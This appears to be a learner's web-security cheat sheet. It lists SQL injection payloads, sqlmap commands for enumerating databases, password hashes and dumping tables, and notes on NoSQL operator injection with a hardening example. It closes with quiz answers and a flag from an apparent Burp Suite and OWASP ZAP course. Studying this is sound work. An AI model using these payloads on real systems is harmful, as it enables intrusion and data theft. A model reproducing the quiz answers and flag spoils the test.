Resume
https://github.com/payloadbox/sql-injection-payload-list
Basic SQL commands:
SHOW DATABASES;
USE db1;
SHOW TABLES;
SELECT * FROM tabla1 WHERE id LIKE 'ID%';
sentencia1 UNION sentencia2;
INSERT into db1.tabla1 VALUES (campo1,campo2,campo3,...);
UPDATE db1.tabla1 set campo1="nuevo_valor" WHERE id="ID";
SELECT * FROM tabla1 WHERE id="ID%" OR SLEEP(5);
sentencia1 OR SLEEP(X) UNION sentencia2;
1 and 1234=1234
SQLi:
Error based: ' OR 1=1 #
Time based: ' or sleep(5)#
Union Select: UNION ALL SELECT null,...#
Boolean-based blind: 1 and 1=1#
SQLMap:
sqlmap
-r REQUESTFILE
-p PARAM1,PARAM2,....PARAMN
--threads=THREADS (default 1)
-o Turn on all optimization switches
--random-agent Use randomly selected HTTP User-Agent header value
--dbms=DBMS DB technology (MySQL, MSSQL...)
--level=LEVEL Level of tests to perform (1-5, default 1)
--risk=RISK Risk of tests to perform (1-3, default 1)
--prefix=PREFIX Injection payload prefix string
--suffix=SUFFIX Injection payload suffix string
--os=OS OS
--users Enumerate DBMS users
--passwords Enumerate DBMS users password hashes
--privileges Enumerate DBMS users privileges
--roles Enumerate DBMS users roles
--dbs Enumerate DBMS databases
--tables Enumerate DBMS database tables
--columns Enumerate DBMS database table columns
--dump Dump DBMS database table entries
-D DB DBMS database to enumerate
-T TBL DBMS database table(s) to enumerate
Example:
sqlmap -r request -p param1,param2,param3 --random-agent --level=3 --risk=2 --dbs
sqlmap -r request -p param1,param2,param3 --random-agent --level=3 --risk=2 --dbms=DBType -D database1 --tables
sqlmap -r request -p param1,param2,param3 --random-agent --level=3 --risk=2 --dbms=DBType -D database1 -T table1 --dump
SQLite:
sqlite_version()
tbl_name
sql
sqlite_master
NoSQL:
mongo
show dbs;
use database1;
show collections; --> (these are the tables)
db.colection1.find() --> shows the contents of the colection1 table
db.city.find({$and:[{"state":"IN"},{"pop":{$lt:100}}]}).count()
db.city.find({"city":{$regex:"^HA.*"}}).count()
logical operators: lt, gt, eq, ne, ...
For injections, remember that where there is X=something -->
X[$logical_operator]=something
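Added example (not part of the original notes): why the X[$operator]=something form works against a backend that copies parsed parameters straight into a MongoDB filter, and the type check that stops it. The parser, the field names user/pass and the sample bodies are assumptions constructed for illustration.

```javascript
// Constructed sample form bodies (application/x-www-form-urlencoded).
const NORMAL = "user=alice&pass=s3cret";
const OPERATOR = "user=alice&pass[$ne]=x"; // the X[$operator]=something shape

// Hypothetical minimal parser mimicking the bracket expansion that many web
// frameworks apply: "pass[$ne]=x" becomes { pass: { "$ne": "x" } }.
// Null-prototype objects keep keys such as "__proto__" inert.
function parseBody(body) {
  const out = Object.create(null);
  for (const [key, value] of new URLSearchParams(body)) {
    const m = /^([^\[\]]+)\[([^\[\]]+)\]$/.exec(key);
    if (!m) {
      out[key] = value;
      continue;
    }
    if (typeof out[m[1]] !== "object") out[m[1]] = Object.create(null);
    out[m[1]][m[2]] = value;
  }
  return out;
}

// Unsafe: parsed values are copied into the filter as-is, so the object
// { "$ne": "x" } reaches the database as a query operator, not as data.
function naiveFilter(params) {
  return { user: params.user, pass: params.pass };
}

// Hardened: every field must be a plain string; anything else is rejected
// before a filter is built.
function safeFilter(params) {
  for (const field of ["user", "pass"]) {
    if (typeof params[field] !== "string") {
      throw new TypeError(`${field} must be a string`);
    }
  }
  return { user: params.user, pass: params.pass };
}

// Detection helper for logging: true if any key at any depth starts with "$".
function hasOperatorKey(value) {
  if (value === null || typeof value !== "object") return false;
  return Object.keys(value).some(
    (k) => k.startsWith("$") || hasOperatorKey(value[k])
  );
}
```

The same string-only check applies to JSON request bodies, where an operator object can arrive without any bracket syntax.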
1.-Which one of the following Intruder Attack types supports the use of multiple
payload sets?
Pitchfork
2.-The Sniper Attack utilizes more than one set of payloads.
False
3.-The Burp Suite Intruder can be used to perform a file and directory brute force
attack.
True
4.-The Decoder module in Burp Suite allows you to decode Base32 strings
True
5.-When working with the Intruder, can you configure a Payload processing rule to
encode the payload in Base64?
True
Flag: d25db4ce54b60b49dfd7b32c52ed8d26
6.-Can you utilize the Repeater to view and modify the headers of a request before
sending the request?
True
7.-When modifying a request in the Repeater, what Keyboard shortcut can be used to
enable URL encoding as you type?
Ctrl+U
8.-Can you modify the number of threads used when running the Forced Browse module
in OWASP ZAP?
True
9.-How many authentication methods are supported when configuring a Context in
OWASP ZAP?
5
10.-Can you use the Spider in OWASP ZAP to automatically process forms?
True